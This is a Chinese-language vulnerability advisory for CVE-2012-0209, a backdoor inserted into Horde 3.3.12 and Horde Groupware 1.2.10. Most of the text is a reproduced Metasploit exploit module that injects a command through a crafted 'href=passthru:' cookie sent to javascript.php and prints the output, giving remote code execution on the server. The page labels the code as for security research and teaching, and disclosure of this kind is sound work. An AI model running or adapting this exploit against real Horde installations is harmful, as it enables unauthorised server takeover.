php horde,Horde 3.3.12后门任意PHP代码执行漏洞

发布日期：2012-02-17

更新日期：2012-02-21

受影响系统：

Horde Horde 3.3.12

Horde Horde Groupware 1.2.10

描述：

--------------------------------------------------------------------------------

CVE ID: CVE-2012-0209

Horde Groupware是邮件和通讯解决方案。Metasploit软件可帮助IT专业人士识别安全漏洞，有助避免数据泄露。

Horde 3.3.12和Horde Groupware 1.2.10被植入了后门代码，远程攻击者可能利用这个问题在服务器上执行任意PHP代码。

测试方法：

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

packetstormsecurity ()提供了如下测试方法：

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})

super(update_info(info,

'Name'           => 'Horde 3.3.12 Backdoor Arbitrary PHP Code Execution',

'Description'    => %q{

This module exploits an arbitrary PHP code execution vulnerability introduced

as a backdoor into Horde 3.3.12 and Horde Groupware 1.2.10.

},

'Author'         => [

'Eric Romang',  # first public PoC

'jduck'         # Metasploit module

],

'License'        => MSF_LICENSE,

'References'     =>

[

[ 'CVE', '2012-0209'],

[ 'URL', 'http://dev.horde.org/h/jonah/stories/view.php?channel_id=1&id=155' ],

[ 'URL', 'http://eromang.zataz.com/2012/02/15/cve-2012-0209-horde-backdoor-analysis/' ]

],

'Privileged'     => false,

'Payload'        =>

{

'BadChars' => "\x0a\x0d",

'DisableNops' => true,

'Space'       => 4096,

'Compat'      =>

{

'PayloadType' => 'cmd',

}

},

'Platform'       => [ 'unix', 'linux' ],

'Arch'           => ARCH_CMD,

'DefaultTarget'  => 0,

'Targets'        => [[ 'Automatic', { }]],

'DisclosureDate' => 'Feb 13 2012'

))

register_options(

[

OptString.new('URI', [true, "Path to Horde installation", "/horde"]),

OptString.new('APP', [true, "App parameter required by javascript.php (must be active)", "horde"]),

], self.class)

end

def exploit

# Make sure the URI begins with a slash

uri = datastore['URI']

if uri[0,1] != '/'

uri = '/' + uri

end

# Make sure the URI ends without a slash, because it's already part of the URI

if uri[-1, 1] == '/'

uri = uri[0, uri.length-1]

end

function = "passthru"

key = Rex::Text.rand_text_alpha(6)

arguments = "echo #{key}`"+payload.raw+"`#{key}"

res = send_request_cgi({

'uri'     => uri + "/services/javascript.php",

'method'  => 'POST',

'ctype'   => 'application/x-www-form-urlencoded',

'data'    => "app="+datastore['APP']+"&file=open_calendar.js",

'headers' =>

{

'Cookie' => "href="+function+":"+arguments,

'Connection' => 'Close',

}

}) #default timeout, we don't care about the response

if (res)

print_status("The server returned: #{res.code} #{res.message}")

end

resp = res.body.split(key)

if resp and resp[1]

print_status(resp[1])

else

print_error("No response found")

end

handler

end

end

建议：

--------------------------------------------------------------------------------

厂商补丁：

Horde

-----

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：